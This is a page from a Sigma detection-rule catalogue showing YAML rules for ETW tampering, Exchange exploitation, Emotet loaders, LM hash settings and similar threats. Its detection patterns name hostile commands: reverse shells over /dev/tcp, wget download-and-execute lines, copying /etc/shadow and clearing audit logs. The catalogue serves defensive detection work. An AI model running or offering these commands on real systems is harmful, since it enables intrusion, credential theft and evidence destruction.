Tool
SIEM
Sigma (generic) detection rules
3,750 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
◈
Detection rules
50 shown of 3,750
high
ESXi Admin Permission Assigned To Account Via ESXCLI
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
view Sigma YAML
title: ESXi Admin Permission Assigned To Account Via ESXCLI
id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf
status: test
description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
references:
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-04
tags:
- attack.persistence
- attack.execution
- attack.privilege-escalation
- attack.t1059.012
- attack.t1098
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains: 'system'
CommandLine|contains|all:
- ' permission '
- ' set'
- 'Admin'
condition: selection
falsepositives:
- Legitimate administration activities
level: high
Convert to SIEM query
high
ETW Logging Disabled In .NET Processes - Registry
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
view Sigma YAML
title: ETW Logging Disabled In .NET Processes - Registry
id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
related:
- id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2022-12-20
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- attack.t1685
logsource:
product: windows
service: security
detection:
selection_etw_enabled:
EventID: 4657
ObjectName|endswith: '\SOFTWARE\Microsoft\.NETFramework'
ObjectValueName: 'ETWEnabled'
NewValue: 0
selection_complus:
EventID: 4657
ObjectName|contains: '\Environment'
ObjectValueName:
- 'COMPlus_ETWEnabled'
- 'COMPlus_ETWFlags'
NewValue: 0
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
ETW Logging Disabled In .NET Processes - Sysmon Registry
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
view Sigma YAML
title: ETW Logging Disabled In .NET Processes - Sysmon Registry
id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
related:
- id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2023-08-17
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- attack.t1685
logsource:
product: windows
category: registry_set
detection:
selection_etw_enabled:
TargetObject|endswith: 'SOFTWARE\Microsoft\.NETFramework\ETWEnabled'
Details: 'DWORD (0x00000000)'
selection_complus:
TargetObject|endswith:
- '\COMPlus_ETWEnabled'
- '\COMPlus_ETWFlags'
Details:
- 0 # For REG_SZ type
- 'DWORD (0x00000000)'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
ETW Logging Tamper In .NET Processes Via CommandLine
Detects changes to environment variables related to ETW logging via the CommandLine.
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
view Sigma YAML
title: ETW Logging Tamper In .NET Processes Via CommandLine
id: 41421f44-58f9-455d-838a-c398859841d4
status: test
description: |
Detects changes to environment variables related to ETW logging via the CommandLine.
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2022-12-09
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'COMPlus_ETWEnabled'
- 'COMPlus_ETWFlags'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
ETW Trace Evasion Activity
Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
view Sigma YAML
title: ETW Trace Evasion Activity
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
status: test
description: |
Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://abuse.io/lockergoga.txt
- https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
author: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community'
date: 2019-03-22
modified: 2022-06-28
tags:
- attack.stealth
- attack.defense-impairment
- attack.t1070
- attack.t1685
- car.2016-04-002
logsource:
category: process_creation
product: windows
detection:
selection_clear_1:
CommandLine|contains|all:
- 'cl'
- '/Trace'
selection_clear_2:
CommandLine|contains|all:
- 'clear-log'
- '/Trace'
selection_disable_1:
CommandLine|contains|all:
- 'sl'
- '/e:false'
selection_disable_2:
CommandLine|contains|all:
- 'set-log'
- '/e:false'
selection_disable_3: # ETW provider removal from a trace session
CommandLine|contains|all:
- 'logman'
- 'update'
- 'trace'
- '--p'
- '-ets'
selection_pwsh_remove: # Autologger provider removal
CommandLine|contains: 'Remove-EtwTraceProvider'
selection_pwsh_set: # Provider “Enable” property modification
CommandLine|contains|all:
- 'Set-EtwTraceProvider'
- '0x11'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Email Exifiltration Via Powershell
Detects email exfiltration via powershell cmdlets
view Sigma YAML
title: Email Exifiltration Via Powershell
id: 312d0384-401c-4b8b-abdf-685ffba9a332
status: test
description: Detects email exfiltration via powershell cmdlets
references:
- https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
- https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml
author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
date: 2022-09-09
tags:
- attack.exfiltration
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains|all:
- 'Add-PSSnapin'
- 'Get-Recipient'
- '-ExpandProperty'
- 'EmailAddresses'
- 'SmtpAddress'
- '-hidetableheaders'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Emotet Loader Execution Via .LNK File
Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
The ".lnk" file was delivered via phishing campaign.
view Sigma YAML
title: Emotet Loader Execution Via .LNK File
id: 1f32d820-1d5c-43fe-8fe2-feef0c952eb7
status: test
description: |
Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
The ".lnk" file was delivered via phishing campaign.
references:
- https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338
- https://twitter.com/Cryptolaemus1/status/1517634855940632576
- https://tria.ge/220422-1pw1pscfdl/
- https://tria.ge/220422-1nnmyagdf2/
author: '@kostastsale'
date: 2022-04-22
modified: 2024-08-15
tags:
- attack.execution
- attack.t1059.006
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\cmd.exe'
- '\explorer.exe'
- '\powershell.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
CommandLine|contains|all:
- 'findstr'
- '.vbs'
- '.lnk'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Enable LM Hash Storage
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
view Sigma YAML
title: Enable LM Hash Storage
id: c420410f-c2d8-4010-856b-dffe21866437
related:
- id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation
type: similar
status: test
description: |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
references:
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
- https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-15
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|endswith: 'System\CurrentControlSet\Control\Lsa\NoLMHash'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Enable LM Hash Storage - ProcCreation
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
view Sigma YAML
title: Enable LM Hash Storage - ProcCreation
id: 98dedfdd-8333-49d4-9f23-d7018cccae53
related:
- id: c420410f-c2d8-4010-856b-dffe21866437 # Registry
type: similar
status: test
description: |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
references:
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
- https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-15
modified: 2023-12-22
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains|all:
- '\System\CurrentControlSet\Control\Lsa'
- 'NoLMHash'
- ' 0'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Enabled User Right in AD to Control User Objects
Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
view Sigma YAML
title: Enabled User Right in AD to Control User Objects
id: 311b6ce2-7890-4383-a8c2-663a9f6b43cd
status: test
description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
references:
- https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
author: '@neu5ron'
date: 2017-07-30
modified: 2021-12-02
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: windows
service: security
definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change'
detection:
selection_base:
EventID: 4704
selection_keywords:
PrivilegeList|contains: 'SeEnableDelegationPrivilege'
condition: all of selection*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Equation Group C2 Communication
Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
view Sigma YAML
title: Equation Group C2 Communication
id: 881834a4-6659-4773-821e-1c151789d873
status: test
description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
references:
- https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
- https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
author: Florian Roth (Nextron Systems)
date: 2017-04-15
modified: 2021-11-27
tags:
- attack.exfiltration
- attack.command-and-control
- attack.g0020
- attack.t1041
- detection.emerging-threats
logsource:
category: firewall
detection:
selection:
- dst_ip:
- '69.42.98.86'
- '89.185.234.145'
- src_ip:
- '69.42.98.86'
- '89.185.234.145'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Equation Group Indicators
Detects suspicious shell commands used in various Equation Group scripts and tools
view Sigma YAML
title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
status: test
description: Detects suspicious shell commands used in various Equation Group scripts and tools
references:
- https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
author: Florian Roth (Nextron Systems)
date: 2017-04-09
modified: 2021-11-27
tags:
- attack.execution
- attack.g0020
- attack.t1059.004
logsource:
product: linux
detection:
keywords:
# evolvingstrategy, elgingamble, estesfox
- 'chown root*chmod 4777 '
- 'cp /bin/sh .;chown'
# tmpwatch
- 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
- 'chown root:root /tmp/.scsi/dev/bin/'
# estesfox
- 'chown root:root x;'
# ratload
- '/bin/telnet locip locport < /dev/console | /bin/sh'
- '/tmp/ratload'
# ewok
- 'ewok -t '
# xspy
- 'xspy -display '
# elatedmonkey
- 'cat > /dev/tcp/127.0.0.1/80 <<END'
# ftshell
- 'rm -f /current/tmp/ftshell.latest'
# ghost
- 'ghost_* -v '
# morerats client
- ' --wipe > /dev/null'
# noclient
- 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
- 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
# auditcleaner
- '> /var/log/audit/audit.log; rm -f .'
- 'cp /var/log/audit/audit.log .tmp'
# reverse shell
- 'sh >/dev/tcp/* <&1 2>&1'
# packrat
- 'ncat -vv -l -p * <'
- 'nc -vv -l -p * <'
# empty bowl
- '< /dev/console | uudecode && uncompress'
- 'sendmail -osendmail;chmod +x sendmail'
# echowrecker
- '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
# dubmoat
- 'chmod 666 /var/run/utmp~'
# poptop
- 'chmod 700 nscd crond'
# abopscript
- 'cp /etc/shadow /tmp/.'
# ys
- '</dev/console |uudecode > /dev/null 2>&1 && uncompress'
# jacktelnet
- 'chmod 700 jp&&netstat -an|grep'
# others
- 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
- 'chmod 700 crond'
- 'wget http*; chmod +x /tmp/sendmail'
- 'chmod 700 fp sendmail pt'
- 'chmod 755 /usr/vmsys/bin/pipe'
- 'chmod -R 755 /usr/vmsys'
- 'chmod 755 $opbin/*tunnel'
- 'chmod 700 sendmail'
- 'chmod 0700 sendmail'
- '/usr/bin/wget http*sendmail;chmod +x sendmail;'
- '&& telnet * 2>&1 </dev/console'
condition: keywords
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Esentutl Volume Shadow Copy Service Keys
Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
view Sigma YAML
title: Esentutl Volume Shadow Copy Service Keys
id: 5aad0995-46ab-41bd-a9ff-724f41114971
status: test
description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2022-12-25
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: 'System\CurrentControlSet\Services\VSS'
Image|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter
filter:
TargetObject|contains: 'System\CurrentControlSet\Services\VSS\Start'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exchange Exploitation Used by HAFNIUM
Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
view Sigma YAML
title: Exchange Exploitation Used by HAFNIUM
id: 67bce556-312f-4c81-9162-c3c9ff2599b2
status: test
description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
references:
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
author: Florian Roth (Nextron Systems)
date: 2021-03-03
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- attack.g0125
- detection.emerging-threats
logsource:
category: webserver
detection:
selection_1:
cs-method: 'POST'
cs-uri-query|contains: '/owa/auth/Current/themes/resources/'
selection_2:
cs-method: 'POST'
cs-uri-query|contains: '/owa/auth/Current/'
cs-user-agent:
- 'DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)'
- 'facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)'
- 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'
- 'Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)'
- 'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html'
- 'Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)'
- 'Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)'
- 'Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)'
- 'Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36'
selection_3:
cs-uri-query|contains: '/ecp/'
cs-method: 'POST'
cs-user-agent:
- 'ExchangeServicesClient/0.0.0.0'
- 'python-requests/2.19.1'
- 'python-requests/2.25.1'
selection_4:
cs-uri-query|contains:
- '/aspnet_client/'
- '/owa/'
cs-method: 'POST'
cs-user-agent:
- 'antSword/v2.1'
- 'Googlebot/2.1+(+http://www.googlebot.com/bot.html)'
- 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'
selection_5:
cs-uri-query|contains:
- '/owa/auth/Current/'
- '/ecp/default.flt'
- '/ecp/main.css'
cs-method: 'POST'
selection_6:
cs-method: 'POST'
cs-uri-query|contains|all:
- '/ecp/'
- '.js'
condition: 1 of selection_*
falsepositives:
- Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related
level: high
Convert to SIEM query
high
Exchange PowerShell Cmdlet History Deleted
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
view Sigma YAML
title: Exchange PowerShell Cmdlet History Deleted
id: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe
status: test
description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
references:
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-26
modified: 2022-12-30
tags:
- attack.stealth
- attack.t1070
logsource:
category: file_delete
product: windows
detection:
selection:
TargetFilename|startswith: '\Logging\CmdletInfra\LocalPowerShell\Cmdlet\'
TargetFilename|contains: '_Cmdlet_'
condition: selection
falsepositives:
- Possible FP during log rotation
level: high
Convert to SIEM query
high
Exchange PowerShell Snap-Ins Usage
Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
view Sigma YAML
title: Exchange PowerShell Snap-Ins Usage
id: 25676e10-2121-446e-80a4-71ff8506af47
status: test
description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
references:
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://www.intrinsec.com/apt27-analysis/
author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
date: 2021-03-03
modified: 2023-03-24
tags:
- attack.execution
- attack.t1059.001
- attack.collection
- attack.t1114
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains: 'Add-PSSnapin'
selection_module:
CommandLine|contains:
- 'Microsoft.Exchange.Powershell.Snapin'
- 'Microsoft.Exchange.Management.PowerShell.SnapIn'
filter_msiexec:
# ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000
ParentImage: 'C:\Windows\System32\msiexec.exe'
CommandLine|contains: '$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exchange ProxyShell Pattern
Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
view Sigma YAML
title: Exchange ProxyShell Pattern
id: 23eee45e-933b-49f9-ae1b-df706d2d52ef
status: test
description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
references:
- https://youtu.be/5mqid-7zp8k?t=2231
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
author: Florian Roth (Nextron Systems), Rich Warren
date: 2021-08-07
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- detection.emerging-threats
logsource:
category: webserver
detection:
selection_1:
sc-status: 401
selection_1_auto:
cs-uri-query|contains: '/autodiscover.json'
selection_1_uri:
cs-uri-query|contains:
- '/powershell'
- '/mapi/nspi'
- '/EWS'
- 'X-Rps-CAT'
selection_poc:
sc-status: 401
cs-uri-query|contains:
# since we don't know how it will appear in the log files, we'll just use all versions
- 'autodiscover.json?@'
- 'autodiscover.json%3f@'
- '%[email protected]'
- 'Email=autodiscover/autodiscover.json'
- '[email protected]'
condition: all of selection_1* or selection_poc
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exchange Set OabVirtualDirectory ExternalUrl Property
Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
view Sigma YAML
title: Exchange Set OabVirtualDirectory ExternalUrl Property
id: 9db37458-4df2-46a5-95ab-307e7f29e675
status: test
description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
references:
- https://twitter.com/OTR_Community/status/1371053369071132675
author: Jose Rodriguez @Cyb3rPandaH
date: 2021-03-15
modified: 2023-01-23
tags:
- attack.persistence
- attack.t1505.003
logsource:
product: windows
service: msexchange-management
detection:
keywords:
'|all':
- 'Set-OabVirtualDirectory'
- 'ExternalUrl'
- 'Page_Load'
- 'script'
condition: keywords
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Execute Pcwrun.EXE To Leverage Follina
Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
view Sigma YAML
title: Execute Pcwrun.EXE To Leverage Follina
id: 6004abd0-afa4-4557-ba90-49d172e0a299
status: test
description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
references:
- https://twitter.com/nas_bench/status/1535663791362519040
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
tags:
- attack.stealth
- attack.t1218
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\pcwrun.exe'
CommandLine|contains: '../'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Execution DLL of Choice Using WAB.EXE
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
view Sigma YAML
title: Execution DLL of Choice Using WAB.EXE
id: fc014922-5def-4da9-a0fc-28c973f41bfb
status: test
description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
references:
- https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml
- https://twitter.com/Hexacorn/status/991447379864932352
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
author: oscd.community, Natalia Shornikova
date: 2020-10-13
modified: 2023-08-17
tags:
- attack.stealth
- attack.t1218
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\Software\Microsoft\WAB\DLLPath'
filter:
Details: '%CommonProgramFiles%\System\wab32.dll'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Execution Of Non-Existing File
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
view Sigma YAML
title: Execution Of Non-Existing File
id: 71158e3f-df67-472b-930e-7d287acaa3e1
status: test
description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
references:
- https://pentestlaboratories.com/2021/12/08/process-ghosting/
author: Max Altgelt (Nextron Systems)
date: 2021-12-09
modified: 2022-12-14
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
image_absolute_path:
Image|contains: '\'
filter_null:
Image: null
filter_empty:
Image:
- '-'
- ''
filter_4688:
- Image:
- 'System'
- 'Registry'
- 'MemCompression'
- 'vmmem'
- CommandLine:
- 'Registry'
- 'MemCompression'
- 'vmmem'
condition: not image_absolute_path and not 1 of filter*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Execution of Powershell Script in Public Folder
This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
view Sigma YAML
title: Execution of Powershell Script in Public Folder
id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4
status: test
description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
references:
- https://www.mandiant.com/resources/evolution-of-fin7
author: Max Altgelt (Nextron Systems)
date: 2022-04-06
modified: 2022-07-14
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
